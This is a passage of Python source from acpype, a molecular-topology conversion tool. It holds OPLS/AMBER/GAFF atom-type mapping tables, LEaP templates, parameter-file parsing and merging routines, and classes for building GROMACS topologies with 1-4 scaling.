"068", "069", "070", "080", "088", "090", "092", "096", "106", "107", "109", "126", "132", "415", "418", "425", "429", ], "C": [ "001", "017", "026", "058", "095", "131", "231", "234", "235", "247", "252", "267", "320", "322", "334", "366", "378", "470", "471", "772", "952", ], "C2": [ "005", "009", "015", "016", "019", "022", "027", "028", "031", "034", "037", "056", "057", "061", "071", "081", "089", "091", "093", "110", ], "CT_2": ["223B", "224B", "225B", "246", "283", "284", "285", "292B", "293B", "295", "298", "299", "906B", "912B"], "CM": ["141", "142", "143", "227", "323", "324", "337", "338", "381", "382", "517", "518", "708"], "CW": ["508", "514", "543", "552", "561", "567", "575", "583", "588", "637"], "CB": ["050", "349", "350", "364", "365", "501", "595", "623", "624"], "CH": ["006", "008", "014", "025", "029", "030", "060", "073"], "CZ": ["261", "423", "754", "925", "927", "928", "929", "931"], "CO": ["189", "191", "193", "195", "197", "198"], "C_2": ["232", "233", "277", "280", "465"], "CR": ["506", "509", "558", "572", "634"], "CQ": ["347", "531", "621", "642"], "CV": ["507", "560", "574", "636"], "CY": ["711", "712", "713", "733"], "CS": ["544", "568", "589"], "CK": ["353", "627"], "CN": ["502", "594"], "CP": ["043", "048"], "CU": ["550", "581"], "CT_3": ["245", "296"], "C=": ["150", "178"], "CD": ["011", "075"], "C4": ["066"], "C7": ["077"], "C8": ["074"], "C9": ["072"], "CX": ["510"], "C!": ["145B"], "C*": ["500"], "C+": ["700"], "C_3": ["271"], "CC": ["045"], "CF": ["044"], "CG": ["049"], "CT_4": ["160"], "Ca2+": ["412"], "Cl": ["123", "151", "226", "264"], "Cl-": ["401", "709"], "Cs+": ["410"], "Cu2+": ["Cu2+"], "Eu3+": ["705"], "F": ["164", "719", "721", "726", "728", "786", "956", "965"], "F-": ["400"], "Fe2+": ["Fe2+"], "Gd3+": ["706"], "HA": [ "146", "316", "318", "389", "524", "525", "526", "529", "534", "535", "536", "540", "541", "546", "547", "554", "555", "556", "563", "564", "565", "569", "570", "576", "577", "578", "584", "585", "586", "597", "598", "599", "600", "601", "602", "613", "614", "615", "616", "617", "618", "619", "629", "630", "631", "638", "639", "640", "643", "653", "654", "655", "656", "715", "717", "740", "741", "746", ], "HC": [ "140", "144", "153", "156", "165", "176", "185", "190", "192", "194", "196", "255", "279", "282", "329", "330", "332", "344", "372", "374", "376", "392", "416", "419", "422", "426", "430", "432", "444", "449", "454", "456", "459", "462", "469", "477", "483", "485", "487", "702", "710", "759", "763", "777", "778", "779", "784", "911", "926", "930", "950", "958", ], "H": [ "004", "013", "041", "047", "128", "240", "241", "250", "254", "314", "325", "327", "339", "342", "343", "357", "358", "360", "367", "369", "383", "385", "387", "388", "428", "479", "481", "504", "513", "545", "553", "562", "596", "632", "744", "745", "909", "910", ], "H3": ["021", "052", "055", "104", "105", "289", "290", "301", "304", "310", "941", "955"], "HO": ["024", "079", "155", "163", "168", "170", "172", "188", "270", "435"], "HS": ["033", "086", "087", "204", "205"], "HW": ["112", "114", "117", "119", "796"], "H4": ["345", "390"], "H5": ["355", "359"], "He": ["130"], "I": ["732"], "I-": ["403"], "K+": ["408"], "Kr": ["098"], "LP": ["433", "797"], "La3+": ["703"], "Li+": ["404", "406"], "MCH3A": ["MCH3A"], "MCH3B": ["MCH3B"], "MNH2": ["MNH2"], "MNH3": ["MNH3"], "MW": ["MW", "115"], "Mg2+": ["411"], "NA": [ "040", "046", "319", "321", "333", "354", "361", "377", "379", "503", "512", "542", "548", "557", "587", "628", ], "NC": ["311", "335", 
"346", "348", "363", "520", "527", "530", "537", "603", "620", "622", "641", "646"], "N": ["003", "012", "094", "237", "238", "239", "249", "251", "265", "478", "480", "787"], "N3": ["020", "101", "102", "103", "286", "287", "288", "309", "427", "940", "953"], "N2": ["051", "054", "300", "303", "313", "341", "356", "368", "386", "743"], "NB": ["042", "352", "511", "549", "559", "573", "580", "626", "635"], "N*": ["319B", "333B", "354B", "377B"], "NT": ["127", "900", "901", "902"], "NZ": ["262", "424", "750", "753"], "NO": ["760", "767"], "NY": ["749", "751"], "Na+": ["405", "407"], "Nd3+": ["704"], "Ne": ["129"], "OS": ["062", "108", "179", "180", "186", "395", "442", "447", "452", "467", "473", "566", "571", "579", "773"], "O": ["002", "059", "236", "248", "253", "326", "328", "340", "370", "384", "771", "788"], "OH": ["023", "078", "154", "162", "167", "169", "171", "187", "268", "420", "434"], "O2": ["018", "125", "272", "394", "441", "446", "451", "954"], "OW": ["111", "113", "116", "118", "795"], "O_2": ["278", "281", "466"], "OY": ["475", "494", "497"], "OL": ["120"], "ON": ["761"], "OU": ["437"], "O_3": ["269"], "P": ["393", "440", "445", "450", "785"], "P+": ["781"], "Rb+": ["409"], "S": ["035", "038", "084", "085", "124", "202", "203", "222", "633"], "SH": ["032", "082", "083", "200", "201", "417", "734"], "SI": ["SI"], "SY": ["474"], "SY2": ["493"], "SZ": ["496"], "Sr2+": ["413"], "Th4+": ["698"], "U": ["436"], "Xe": ["099"], "Yb3+": ["707"], "Zn2+": ["Zn2+"], } # reverse dictOplsAtomType2OplsGmxCode oplsCode2AtomTypeDict = {} for k, vv in list(dictOplsAtomType2OplsGmxCode.items()): for code in vv: oplsCode2AtomTypeDict[code] = k # if code in oplsCode2AtomTypeDict.keys(): # oplsCode2AtomTypeDict[code].append(k) # else: # oplsCode2AtomTypeDict[code] = [k] # Cross dictAmbAtomType2AmbGmxCode with dictOplsAtomType2OplsGmxCode & add H1,HP,H2 dictAtomTypeAmb2OplsGmxCode = {"H1": ["140", "1.00800"], "HP": ["140", "1.00800"], "H2": ["140", "1.00800"]} dictOplsMass = { "SY2": ["32.06000"], "Zn2+": ["65.37000"], "CQ": ["12.01100"], "CP": ["12.01100"], "Nd3+": ["144.24000"], "Br-": ["79.90400"], "Cu2+": ["63.54600"], "Br": ["79.90400"], "H": ["1.00800"], "P": ["30.97376"], "Sr2+": ["87.62000"], "ON": ["15.99940"], "OL": ["0.00000"], "OH": ["15.99940"], "OY": ["15.99940"], "OW": ["15.99940"], "OU": ["15.99940"], "OS": ["15.99940"], "Am3+": ["243.06000"], "HS": ["1.00800"], "HW": ["1.00800"], "HO": ["1.00800"], "HC": ["1.00800"], "HA": ["1.00800"], "O2": ["15.99940"], "Ca2+": ["40.08000"], "Th4+": ["232.04000"], "He": ["4.00260"], "C": ["12.01100"], "Cs+": ["132.90540"], "O": ["15.99940"], "Gd3+": ["157.25000"], "S": ["32.06000"], "P+": ["30.97376"], "La3+": ["138.91000"], "H3": ["1.00800"], "H4": ["1.00800"], "MNH2": ["0.00000"], "MW": ["0.00000"], "NB": ["14.00670"], "K+": ["39.09830"], "Ne": ["20.17970"], "Rb+": ["85.46780"], "C+": ["12.01100"], "C*": ["12.01100"], "NO": ["14.00670"], "CT_4": ["12.01100"], "NA": ["14.00670"], "C!": ["12.01100"], "NC": ["14.00670"], "NZ": ["14.00670"], "CT_2": ["12.01100"], "CT_3": ["12.01100"], "NY": ["14.00670"], "C9": ["14.02700"], "C8": ["13.01900"], "C=": ["12.01100"], "Yb3+": ["173.04000"], "C3": ["15.03500", "12.01100"], "C2": ["14.02700"], "C7": ["12.01100"], "C4": ["16.04300"], "CK": ["12.01100"], "Cl-": ["35.45300"], "N*": ["14.00670"], "CH": ["13.01900"], "CO": ["12.01100"], "CN": ["12.01100"], "CM": ["12.01100"], "F": ["18.99840"], "CC": ["12.01100"], "CB": ["12.01100"], "CA": ["12.01100"], "CG": ["12.01100"], "CF": ["12.01100"], "N": 
["14.00670"], "CZ": ["12.01100"], "CY": ["12.01100"], "CX": ["12.01100"], "Ac3+": ["227.03000"], "CS": ["12.01100"], "CR": ["12.01100"], "N2": ["14.00670"], "N3": ["14.00670"], "CW": ["12.01100"], "CV": ["12.01100"], "CU": ["12.01100"], "CT": ["12.01100"], "SZ": ["32.06000"], "SY": ["32.06000"], "Cl": ["35.45300"], "NT": ["14.00670"], "O_2": ["15.99940"], "Xe": ["131.29300"], "SI": ["28.08000"], "SH": ["32.06000"], "Eu3+": ["151.96000"], "F-": ["18.99840"], "MNH3": ["0.00000"], "H5": ["1.00800"], "C_3": ["12.01100"], "C_2": ["12.01100"], "I-": ["126.90450"], "LP": ["0.00000"], "I": ["126.90450"], "Na+": ["22.98977"], "Li+": ["6.94100"], "U": ["0.00000"], "MCH3A": ["0.00000"], "MCH3B": ["0.00000"], "CD": ["13.01900", "12.01100"], "O_3": ["15.99940"], "Kr": ["83.79800"], "Fe2+": ["55.84700"], "Ar": ["39.94800"], "Mg2+": ["24.30500"], "Ba2+": ["137.33000"], } for ambKey in dictAmbAtomType2AmbGmxCode: if ambKey in dictOplsAtomType2OplsGmxCode: dictAtomTypeAmb2OplsGmxCode[ambKey] = dictOplsAtomType2OplsGmxCode[ambKey] + list(dictOplsMass[ambKey]) # learnt from 22 residues test. dictAtomTypeAmb2OplsGmxCode = { "HS": ["204", "1.008"], "HP": ["140", "1.008"], "HO": ["155", "168", "1.008"], "HC": ["140", "1.008"], "HA": ["146", "1.008"], "O2": ["272", "15.9994"], "C*": ["500", "12.011"], "NA": ["503", "512", "14.0067"], "NB": ["511", "14.0067"], "CB": ["501", "12.011"], "C": ["235", "271", "12.011"], "CN": ["502", "12.011"], "CM": ["302", "12.011"], "CC": ["507", "508", "510", "12.011"], "H": ["240", "241", "290", "301", "304", "310", "504", "513", "1.008"], "CA": ["145", "166", "12.011"], "O": ["236", "15.9994"], "N": ["237", "238", "239", "14.0067"], "S": ["202", "32.06"], "CR": ["506", "509", "12.011"], "N2": ["300", "303", "14.0067"], "N3": ["287", "309", "14.0067"], "CW": ["508", "510", "514", "12.011"], "CV": ["507", "12.011"], "CT": [ "135", "136", "137", "149", "157", "158", "206", "209", "210", "223B", "224B", "245", "246", "274", "283", "284", "285", "292", "292B", "293B", "296", "307", "308", "505", "12.011", ], "OH": ["154", "167", "15.9994"], "H1": ["140", "1.008"], "H4": ["146", "1.008"], "H5": ["146", "1.008"], "SH": ["200", "32.06"], } # learnt from 22 residues test. 
dictAtomTypeGaff2OplsGmxCode = { "cc": ["500", "506", "507", "508", "514", "12.011"], "ca": ["145", "166", "501", "502", "12.011"], "h1": ["140", "1.008"], "h4": ["146", "1.008"], "h5": ["146", "1.008"], "cz": ["302", "12.011"], "c2": ["509", "510", "12.011"], "nh": ["300", "303", "14.0067"], "ha": ["146", "1.008"], "na": ["503", "512", "14.0067"], "nc": ["511", "14.0067"], "nd": ["511", "14.0067"], "hx": ["140", "1.008"], "hs": ["204", "1.008"], "hn": ["240", "241", "290", "301", "304", "310", "504", "513", "1.008"], "ho": ["155", "168", "1.008"], "c3": [ "135", "136", "137", "149", "157", "158", "206", "209", "210", "223B", "224B", "245", "246", "274", "283", "284", "285", "292", "292B", "293B", "296", "307", "308", "505", "12.011", ], "hc": ["140", "1.008"], "cd": ["500", "506", "507", "508", "514", "12.011"], "c": ["235", "271", "12.011"], "oh": ["154", "167", "15.9994"], "ss": ["202", "32.06"], "o": ["236", "272", "15.9994"], "n": ["237", "238", "239", "14.0067"], "sh": ["200", "32.06"], "n4": ["287", "309", "14.0067"], } # draft atomTypeAmber2oplsDict = { "HS": ["HS"], "HP": ["HC"], "HO": ["HO"], "HC": ["HC"], "HA": ["HA"], "O2": ["O2"], "C*": ["C*"], "NA": ["NA"], "NB": ["NB"], "CB": ["CB"], "CN": ["CN"], "CV": ["CV"], "CM": ["CA"], "CA": ["CA"], "CR": ["CR"], "OH": ["OH"], "H1": ["HC"], "H4": ["HA"], "N2": ["N2"], "N3": ["N3"], "H5": ["HA"], "SH": ["SH"], "N": ["N"], "S": ["S"], "O": ["O"], "C": ["C", "C_3"], "CW": ["CW", "CX"], "H": ["H", "H3"], "CC": ["CX", "CW", "CV"], "CT": ["CT", "CT_2", "CT_3"], } # draft a2oD = { "amber99_2": ["opls_235", "opls_271"], "amber99_3": ["opls_302", "opls_145"], "amber99_5": ["opls_507", "opls_508", "opls_510"], "amber99_11": [ "opls_209", "opls_158", "opls_283", "opls_223B", "opls_293B", "opls_284", "opls_292B", "opls_274", "opls_136", "opls_135", "opls_292", "opls_157", "opls_206", "opls_137", "opls_505", "opls_224B", "opls_307", "opls_308", "opls_210", "opls_149", ], "amber99_13": ["opls_514"], "amber99_14": ["opls_500"], "amber99_17": ["opls_504", "opls_241", "opls_240", "opls_290", "opls_301", "opls_310", "opls_304", "opls_513"], "amber99_18": ["opls_140"], "amber99_19": ["opls_140"], "amber99_22": ["opls_146"], "amber99_23": ["opls_146"], "amber99_25": ["opls_155"], "amber99_26": ["opls_204"], "amber99_28": ["opls_140"], "amber99_34": ["opls_238", "opls_239", "opls_237"], "amber99_35": ["opls_512", "opls_503"], "amber99_36": ["opls_511"], "amber99_38": ["opls_300", "opls_303"], "amber99_39": ["opls_309", "opls_287"], "amber99_41": ["opls_236"], "amber99_43": ["opls_154"], "amber99_45": ["opls_272"], "amber99_47": ["opls_202"], "amber99_48": ["opls_200"], } pid = 0 head = "%s created by acpype (v: " + tag + ") on %s\n" date = datetime.now().ctime() usage = """ acpype -i _file_ [-c _string_] [-n _int_] [-m _int_] [-a _string_] [-f] etc. or acpype -p _prmtop_ -x _inpcrd_ [-d]""" epilog = """ output: assuming 'root' is the basename of either the top input file, the 3-letter residue name or user defined (-b option) root_bcc_gaff.mol2: final mol2 file with 'bcc' charges and 'gaff' atom type root_AC.inpcrd : coord file for AMBER root_AC.prmtop : topology and parameter file for AMBER root_AC.lib : residue library file for AMBER root_AC.frcmod : modified force field parameters root_GMX.gro : coord file for GROMACS root_GMX.top : topology file for GROMACS root_GMX.itp : molecule unit topology and parameter file for GROMACS root_GMX_OPLS.itp : OPLS/AA mol unit topol & par file for GROMACS (experimental!) 
em.mdp, md.mdp : run parameters file for GROMACS
root_NEW.pdb : final pdb file generated by ACPYPE
root_CNS.top : topology file for CNS/XPLOR
root_CNS.par : parameter file for CNS/XPLOR
root_CNS.inp : run parameters file for CNS/XPLOR
root_CHARMM.rtf : topology file for CHARMM
root_CHARMM.prm : parameter file for CHARMM
root_CHARMM.inp : run parameters file for CHARMM"""

SLEAP_TEMPLATE = """
source %(leapAmberFile)s
source %(leapGaffFile)s
set default fastbld on
#set default disulfide auto
%(res)s = loadpdb %(baseOrg)s.pdb
#check %(res)s
saveamberparm %(res)s %(acBase)s.prmtop %(acBase)s.inpcrd
saveoff %(res)s %(acBase)s.lib
quit
"""

TLEAP_TEMPLATE = """
verbosity 1
source %(leapAmberFile)s
source %(leapGaffFile)s
mods = loadamberparams %(acBase)s.frcmod
%(res)s = loadmol2 %(acMol2FileName)s
check %(res)s
saveamberparm %(res)s %(acBase)s.prmtop %(acBase)s.inpcrd
saveoff %(res)s %(acBase)s.lib
quit
"""


def dotproduct(aa, bb):
    """scalar product"""
    return sum((a * b) for a, b in zip(aa, bb))


def crosproduct(a, b):
    """cross product"""
    c = [a[1] * b[2] - a[2] * b[1], a[2] * b[0] - a[0] * b[2], a[0] * b[1] - a[1] * b[0]]
    return c


def length(v):
    """norm (length) of a vector"""
    return math.sqrt(dotproduct(v, v))


def vec_sub(aa, bb):
    """vector A - B"""
    return [a - b for a, b in zip(aa, bb)]


def imprDihAngle(a, b, c, d):
    """calculate improper dihedral angle"""
    ba = vec_sub(a, b)
    bc = vec_sub(c, b)
    cb = vec_sub(b, c)
    cd = vec_sub(d, c)
    n1 = crosproduct(ba, bc)
    n2 = crosproduct(cb, cd)
    angle = math.acos(dotproduct(n1, n2) / (length(n1) * length(n2))) * 180 / Pi
    cp = crosproduct(n1, n2)
    if dotproduct(cp, bc) < 0:
        angle = -1 * angle
    return angle


def distanceAA(c1, c2):
    """Squared distance between two atoms (compared against minDist2/maxDist2)"""
    dist2 = (c1[0] - c2[0]) ** 2 + (c1[1] - c2[1]) ** 2 + (c1[2] - c2[2]) ** 2
    # dist2 = math.sqrt(dist2)
    return dist2


def elapsedTime(seconds, add_s=False, separator=" "):
    """
    Takes an amount of seconds and turns it into a human-readable amount of time.
    """
    suffixes = ["y", "w", "d", "h", "m", "s"]
    # the formatted time string to be returned
    atime = []
    # the pieces of time to iterate over (days, hours, minutes, etc)
    # - the first piece in each tuple is the suffix (d, h, w)
    # - the second piece is the length in seconds (a day is 60s * 60m * 24h)
    parts = [
        (suffixes[0], 60 * 60 * 24 * 7 * 52),
        (suffixes[1], 60 * 60 * 24 * 7),
        (suffixes[2], 60 * 60 * 24),
        (suffixes[3], 60 * 60),
        (suffixes[4], 60),
        (suffixes[5], 1),
    ]
    # for each time piece, grab the value and remaining seconds, and add it to
    # the time string
    for suffix, alength in parts:
        value = seconds // alength
        if value > 0:
            seconds = seconds % alength
            atime.append("%s%s" % (str(value), (suffix, (suffix, suffix + "s")[value > 1])[add_s]))
        if seconds < 1:
            break
    return separator.join(atime)


def splitBlock(dat):
    """split an amber parm dat file in blocks
    0 = mass, 1 = extra + bond, 2 = angle, 3 = dihedral, 4 = improp, 5 = hbond
    6 = equiv nbon, 7 = nbon, 8 = END, 9 = etc.
""" dict_ = {} count = 0 for line in dat: line = line.rstrip() if count in dict_: dict_[count].append(line) else: dict_[count] = [line] if not line: count += 1 return dict_ def parseFrcmod(lista): """Parse FRCMOD file""" heads = ["MASS", "BOND", "ANGL", "DIHE", "IMPR", "HBON", "NONB"] dict_ = {} for line in lista[1:]: line = line.strip() if line[:4] in heads: ahead = line[:4] dict_[ahead] = [] dd = {} continue if line: key = line.replace(" -", "-").replace("- ", "-").split()[0] if key in dd: if not dd[key].count(line): dd[key].append(line) else: dd[key] = [line] dict_[ahead] = dd for kk in dict_: if not dict_[kk]: dict_.pop(kk) return dict_ def parmMerge(fdat1, fdat2, frcmod=False): """merge two amber parm dat/frcmod files and save in /tmp""" name1 = os.path.basename(fdat1).split(".dat")[0] if frcmod: name2 = os.path.basename(fdat2).split(".")[1] else: name2 = os.path.basename(fdat2).split(".dat")[0] mname = "/tmp/" + name1 + name2 + ".dat" mdatFile = open(mname, "w") mdat = ["merged %s %s" % (name1, name2)] # if os.path.exists(mname): return mname dat1 = splitBlock(open(fdat1).readlines()) if frcmod: dHeads = {"MASS": 0, "BOND": 1, "ANGL": 2, "DIHE": 3, "IMPR": 4, "HBON": 5, "NONB": 7} dat2 = parseFrcmod(open(fdat2).readlines()) # dict for kk in dat2: for parEntry in dat2[kk]: idFirst = None for line in dat1[dHeads[kk]][:]: if line: key = line.replace(" -", "-").replace("- ", "-").split()[0] if key == parEntry: if not idFirst: idFirst = dat1[dHeads[kk]].index(line) dat1[dHeads[kk]].remove(line) rev = dat2[kk][parEntry][:] rev.reverse() if idFirst is None: idFirst = 0 for ll in rev: if dHeads[kk] in [0, 1, 7]: # MASS has title in index 0 and so BOND, NONB dat1[dHeads[kk]].insert(idFirst + 1, ll) else: dat1[dHeads[kk]].insert(idFirst, ll) dat1[0][0] = mdat[0] for kk in dat1: for line in dat1[kk]: mdatFile.write(line + "\n") return mname dat2 = splitBlock(open(fdat2).readlines()) for kk in list(dat1)[:8]: if kk == 0: lines = dat1[kk][1:-1] + dat2[kk][1:-1] + [""] for line in lines: mdat.append(line) if kk == 1: for i in dat1[kk]: if "-" in i: id1 = dat1[kk].index(i) break for j in dat2[kk]: if "-" in j: id2 = dat2[kk].index(j) break l1 = dat1[kk][:id1] l2 = dat2[kk][:id2] line = "" for item in l1 + l2: line += item.strip() + " " mdat.append(line) lines = dat1[kk][id1:-1] + dat2[kk][id2:-1] + [""] for line in lines: mdat.append(line) if kk in [2, 3, 4, 5, 6]: # angles, p dih, imp dih lines = dat1[kk][:-1] + dat2[kk][:-1] + [""] for line in lines: mdat.append(line) if kk == 7: lines = dat1[kk][:-1] + dat2[kk][1:-1] + [""] for line in lines: mdat.append(line) for kk in list(dat1)[8:]: for line in dat1[kk]: mdat.append(line) for kk in list(dat2)[9:]: for line in dat2[kk]: mdat.append(line) for line in mdat: mdatFile.write(line + "\n") mdatFile.close() return mname def job_pids_family(jpid): """INTERNAL: Return all job processes (PIDs)""" apid = repr(jpid) dict_pids = {} pids = [apid] cmd = "ps -A -o uid,pid,ppid|grep %i" % os.getuid() out = _getoutput(cmd).split("\n") # getoutput("ps -A -o uid,pid,ppid|grep %i" % os.getuid()).split('\n') for item in out: vec = item.split() dict_pids[vec[2]] = vec[1] while True: try: apid = dict_pids[apid] pids.append(apid) except KeyError: break return " ".join(pids) def _getoutput(cmd): """to simulate commands.getoutput in order to work with python 2.6 up to 3.x""" out = sub.Popen(cmd, shell=True, stderr=sub.STDOUT, stdout=sub.PIPE).communicate()[0][:-1] try: o = str(out.decode()) except Exception: o = str(out) return o def while_replace(string): while " " in 
string: string = string.replace(" ", " ") return string class Topology_14: """ Amber topology abstraction for non-uniform 1-4 scale factors """ def __init__(self) -> None: self.pointers = array.array("d") self.charge = array.array("d") self.atom_type_index = array.array("d") self.nonbonded_parm_index = array.array("d") self.scee_scale_factor = array.array("d") self.scnb_scale_factor = array.array("d") self.dihedral_force_constants = array.array("d") self.dihedral_periodicity = array.array("d") self.dihedral_phase = array.array("d") self.dihedral_yes_H = array.array("d") self.dihedral_no_H = array.array("d") self.lennard_jones_acoef = array.array("d") self.lennard_jones_bcoef = array.array("d") def read_amber_topology(self, buff): """Read AMBER topology file""" flag_strings = [ "%FLAG POINTERS", "%FLAG CHARGE", "%FLAG ATOM_TYPE_INDEX", "%FLAG NONBONDED_PARM_INDEX", "%FLAG SCEE_SCALE_FACTOR", "%FLAG SCNB_SCALE_FACTOR", "%FLAG DIHEDRAL_FORCE_CONSTANT", "%FLAG DIHEDRAL_PERIODICITY", "%FLAG DIHEDRAL_PHASE", "%FLAG DIHEDRALS_INC_HYDROGEN", "%FLAG DIHEDRALS_WITHOUT_HYDROGEN", "%FLAG LENNARD_JONES_ACOEF", "%FLAG LENNARD_JONES_BCOEF", ] attributes = [ "pointers", "charge", "atom_type_index", "nonbonded_parm_index", "scee_scale_factor", "scnb_scale_factor", "dihedral_force_constants", "dihedral_periodicity", "dihedral_phase", "dihedral_yes_H", "dihedral_no_H", "lennard_jones_acoef", "lennard_jones_bcoef", ] for i, _item in enumerate(attributes): try: setattr(self, attributes[i], self.p7_array_read(buff, flag_strings[i])) except Exception: print("Skipping non-existent attributes", attributes[i], flag_strings[i]) @staticmethod def skipline(buff, index): """skip line""" while buff[index] != "\n": index += 1 index += 1 return index def p7_array_read(self, buff, flag_string): """Convert AMBER topology data to python array""" myarray = array.array("d") i = buff.index(flag_string) i = self.skipline(buff, i) i = self.skipline(buff, i) while 1: while buff[i] == " " or buff[i] == "\t" or buff[i] == "\n": i += 1 j = i if buff[i] == "%": break while buff[i] != " " and buff[i] != "\t" and buff[i] != "\n": i += 1 myarray.append(float(buff[j:i])) return myarray def print_gmx_pairs(self): """Generate non-bonded pairs list""" pair_list = [] pair_buff = "[ pairs_nb ]\n; ai aj funct qi qj sigma epsilon\n" pair_list.append(pair_buff) dihedrals = self.dihedral_yes_H + self.dihedral_no_H dih_number = len(dihedrals) j = int(0) while j < dih_number: if dihedrals[j + 2] > 0: parm_idx = int(dihedrals[j + 4]) - 1 scee_scale_factor = self.scee_scale_factor[parm_idx] if scee_scale_factor == 0: scee_scale_factor = 1.2 ai = int(abs(dihedrals[j]) / 3) al = int(abs(dihedrals[j + 3]) / 3) qi = self.charge[ai] / qConv ql = self.charge[al] / qConv / scee_scale_factor ntypes = int(self.pointers[1]) ai_index = int(self.atom_type_index[ai]) al_index = int(self.atom_type_index[al]) nb_parm_index = int(self.nonbonded_parm_index[ntypes * (ai_index - 1) + al_index - 1]) - 1 scnb_scale_factor = self.scnb_scale_factor[parm_idx] if scnb_scale_factor == 0: scnb_scale_factor = 2 lj_acoeff = self.lennard_jones_acoef[nb_parm_index] / scnb_scale_factor lj_bcoeff = self.lennard_jones_bcoef[nb_parm_index] / scnb_scale_factor if lj_bcoeff != 0: sigma6 = lj_acoeff / lj_bcoeff else: sigma6 = 1 # arbitrary and doesnt matter epsilon = lj_bcoeff / 4 / sigma6 * 4.184 sigma = sigma6 ** (1 / 6) / 10 pair_buff = ( "{:>10.0f} {:>10.0f} {:>6.0f} ".format(ai + 1, al + 1, 1) + "{:>10.6f} {:>10.6f} ".format(qi, ql) + "{:>15.5e} {:>15.5e}\n".format(sigma, epsilon) ) 
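                # Bookkeeping for the [ pairs_nb ] entry just formatted: AMBER
                # tabulates 12-6 terms as A = 4*eps*sigma^12 and B = 4*eps*sigma^6
                # (kcal/mol, Angstrom), so sigma^6 = A/B and eps = B / (4*sigma^6).
                # Dividing A and B by SCNB leaves sigma unchanged and folds the
                # 1-4 van der Waals scaling into eps; the factors 4.184
                # (kcal/mol -> kJ/mol) and 1/10 (Angstrom -> nm) convert to
                # GROMACS units, and the 1-4 electrostatic scaling is folded
                # into ql via SCEE.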
pair_list.append(pair_buff) j += 5 return "".join(pair_list) def hasNondefault14(self): """Check non-uniform 1-4 scale factor""" for val in self.scee_scale_factor: if val not in (0, 1.2): return True for val in self.scnb_scale_factor: if val not in (0, 2): return True return False def patch_gmx_topol14(self, gmx_init_top): """Patch GMX topology file for non-uniform 1-4 scale factor""" pair_buff = self.print_gmx_pairs() jdefault = gmx_init_top.index("\n[ atomtypes ]") ipair = gmx_init_top.index("[ pairs ]") jpair = gmx_init_top.index("\n[ angles ]") init_buff = ( "\n\n[ defaults ]\n" + "; nbfunc comb-rule gen-pairs \n" + "1 2 no \n" ) return ( gmx_init_top.splitlines()[0] + init_buff + gmx_init_top[jdefault:ipair] + pair_buff + gmx_init_top[jpair : len(gmx_init_top)] ) class AbstractTopol: """ Super class to build topologies """ __metaclass__ = abc.ABCMeta @abc.abstractmethod def __init__(self): if self.__class__ is AbstractTopol: raise TypeError("Attempt to create istance of abstract class AbstractTopol") self.debug = None self.verbose = None self.chargeVal = None self.tmpDir = None self.absInputFile = None self.chargeType = None self.babelExe = None self.baseName = None self.acExe = None self.force = None self.acBaseName = None self.atomType = None self.acMol2FileName = None self.multiplicity = None self.qFlag = None self.ekFlag = None self.timeTol = None self.acXyzFileName = None self.acTopFileName = None self.sleapExe = None self.acParDict = None self.tleapExe = None self.parmchkExe = None self.acFrcmodFileName = None self.gaffDatfile = None self.homeDir = None self.rootDir = None self.extOld = None self.engine = None self.direct = None self.disam = None self.gmx4 = None self.sorted = None self.chiral = None self.outTopols = None self.ext = None self.xyzFileData = None self.obchiralExe = None self.charmmBase = None self.allhdg = None self.topo14Data = None self.atomPairs = None self.properDihedralsGmx45 = None self.properDihedralsAlphaGamma = None self.properDihedralsCoefRB = None self.resName = None self.acLog = None self.sleapLog = None self.tleapLog = None self.parmchkLog = None self.inputFile = None self.babelLog = None self.absHomeDir = None self.molTopol = None self.topFileData = None self.residueLabel = None self._atomTypeNameList = None self.atomTypeSystem = None self.totalCharge = None self.atoms = None self.atomTypes = None self.pbc = None self.bonds = None self.angles = None self.properDihedrals = None self.improperDihedrals = None self.condensedProperDihedrals = None self.chiralGroups = None self.excludedAtoms = None self.atomsGromacs = None self.atomTypesGromacs = None self.CnsTopFileName = None self.CnsInpFileName = None self.CnsParFileName = None self.CnsPdbFileName = None def printDebug(self, text=""): """Debug log level""" if self.debug: print("DEBUG: %s" % while_replace(text)) def printWarn(self, text=""): """Warn log level""" if self.verbose: print("WARNING: %s" % while_replace(text)) def printError(self, text=""): """Error log level""" if self.verbose: print("ERROR: %s" % while_replace(text)) def printMess(self, text=""): """Info log level""" if self.verbose: print("==> %s" % while_replace(text)) def printQuoted(self, text=""): """Print quoted messages""" if self.verbose: print(10 * "+" + "start_quote" + 59 * "+") print(while_replace(text)) print(10 * "+" + "end_quote" + 61 * "+") def guessCharge(self): """ Guess the charge of a system based on antechamber Returns None in case of error """ done = False error = False charge = self.chargeVal localDir = 
os.path.abspath(".") if not os.path.exists(self.tmpDir): os.mkdir(self.tmpDir) if not os.path.exists(os.path.join(self.tmpDir, self.inputFile)): copy2(self.absInputFile, self.tmpDir) os.chdir(self.tmpDir) if self.chargeType == "user": if self.ext == ".mol2": self.printMess("Reading user's charges from mol2 file...") charge = self.readMol2TotalCharge(self.inputFile) done = True else: self.printWarn("cannot read charges from a PDB file") self.printWarn("using now 'bcc' method for charge") if self.chargeVal is None and not done: self.printWarn("no charge value given, trying to guess one...") mol2FileForGuessCharge = self.inputFile if self.ext == ".pdb": cmd = "%s -ipdb %s -omol2 -O %s.mol2" % (self.babelExe, self.inputFile, self.baseName) self.printDebug("guessCharge: " + cmd) out = _getoutput(cmd) self.printDebug(out) mol2FileForGuessCharge = os.path.abspath(self.baseName + ".mol2") in_mol = "mol2" else: in_mol = self.ext[1:] if in_mol == "mol": in_mol = "mdl" cmd = "%s -dr no -i %s -fi %s -o tmp -fo mol2 -c gas -pf y" % (self.acExe, mol2FileForGuessCharge, in_mol) if self.debug: self.printMess("Debugging...") cmd = cmd.replace("-pf y", "-pf n") print(while_replace(cmd)) log = _getoutput(cmd).strip() if os.path.exists("tmp"): charge = self.readMol2TotalCharge("tmp") else: try: charge = float( log.strip() .split("equal to the total charge (")[-1] .split(") based on Gasteiger atom type, exit")[0] ) except Exception: error = True if error: self.printError("guessCharge failed") os.chdir(localDir) self.printQuoted(log) self.printMess("Trying with net charge = 0 ...") # self.chargeVal = 0 charge = float(charge) charge2 = int(round(charge)) drift = abs(charge2 - charge) self.printDebug("Net charge drift '%3.6f'" % drift) if drift > diffTol: self.printError("Net charge drift '%3.5f' bigger than tolerance '%3.5f'" % (drift, diffTol)) if not self.force: sys.exit(7) self.chargeVal = str(charge2) self.printMess("... charge set to %i" % charge2) os.chdir(localDir) def setResNameCheckCoords(self): """Set a 3 letter residue name and check coords duplication """ exit_ = False localDir = os.path.abspath(".") if not os.path.exists(self.tmpDir): os.mkdir(self.tmpDir) # if not os.path.exists(os.path.join(tmpDir, self.inputFile)): 